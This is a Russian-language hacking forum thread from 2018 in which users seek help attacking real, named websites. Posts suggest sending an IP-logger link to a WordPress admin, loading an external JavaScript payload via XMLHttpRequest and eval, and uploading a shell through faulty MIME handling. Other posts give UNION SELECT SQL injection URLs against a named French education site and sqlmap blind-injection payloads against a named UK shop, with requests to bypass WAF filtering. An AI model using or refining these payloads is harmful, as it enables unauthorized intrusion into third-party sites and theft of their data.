21.07.2018, 16:38
|
|
Новичок
Регистрация: 11.08.2017
Сообщений: 3
Провел на форуме:
804
Репутация:
0
|
|
Здраствуйте, форум. Интересует возможность подключения сторонней JS библиотеки используя html тег . Кто подскажет.
Или любой другой способ использовать js на сайте forum.minecraft-galaxy.ru
|
|
|
21.07.2018, 16:41
|
|
Новичок
Регистрация: 11.08.2017
Сообщений: 3
Провел на форуме:
804
Репутация:
0
|
|
Сообщение от Octavian
↑
Есть возможность узнать ip администратора сайта на wordpress?
Подкинуть ему ссылку на почту с айпи логером
|
|
|
|
21.07.2018, 23:28
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114
Репутация:
24
|
|
Привет а как большой js засовывать, когда невозможно за тега а выйти?
|
|
|
|
22.07.2018, 00:13
|
|
Участник форума
Регистрация: 31.12.2017
Сообщений: 107
Провел на форуме:
20361
Репутация:
46
|
|
Сообщение от Octavian
↑
Привет а как большой js засовывать, когда невозможно за тега а выйти?
подгрузкой js пейлоада с внешнего сервера через XMLHttpRequest и последующим евалом
|
|
|
|
22.07.2018, 00:15
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114
Репутация:
24
|
|
Сообщение от dmax0fw
↑
подгрузкой js пейлоада с внешнего сервера через XMLHttpRequest и последующим евалом
можно пример
|
|
|
|
22.07.2018, 00:18
|
|
Участник форума
Регистрация: 31.12.2017
Сообщений: 107
Провел на форуме:
20361
Репутация:
46
|
|
буквально сегодня в соседней теме отвечал человеку с похожим вопросом
/threads/464058/
|
|
|
|
24.07.2018, 18:35
|
|
Новичок
Регистрация: 22.03.2016
Сообщений: 1
Провел на форуме:
220
Репутация:
0
|
|
Сообщение от Muracha
↑
Попробуй залить шелл через плохую обработку mine-type используя tor+live http clone
Уязвимости типа "некорректной обработки данных при загрузке файлов пользователей".
Самая изощренная уязвимость но и самая интересная. Да да, это вам не скули крутить
Можно подробнее? гугление ничего толком не дает.
Есть усечение пути (с кучей /./.) - но это не то, как я понимаю.
|
|
|
|
25.07.2018, 21:20
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Помогите ваф обойти
Код:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
|
|
|
|
26.07.2018, 09:39
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от BabaDook
↑
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]reseau[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]canope[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]fr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]climatscolaire[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ressources[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]resultat[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]de[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]recherche[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tx_cndpclimatsco_pi1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5Baxes[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5D[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tx_cndpclimatsco_pi1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5Bthemes[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5D[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tx_cndpclimatsco_pi1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5Blocalisations[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5D[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]a_32[/COLOR][COLOR="#007700"]+and+[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union distinct select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]31[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]32[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]33[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]34[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR]
From фильтруется, помогите обойти)
|
|
|
|
26.07.2018, 17:46
|
|
Новичок
Регистрация: 26.07.2018
Сообщений: 1
Провел на форуме:
305
Репутация:
0
|
|
Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url http://shoebrand.co.uk/index.php?rou...th=64&limit=32 с использованием тампера between возвращает ошибку:
[WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times.
Найденные уязвимости:
Parameter: path (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/category&path=64 AND 9469=9469&limit=32
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: route=product/category&path=64 AND SLEEP(10)&limit=32
Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
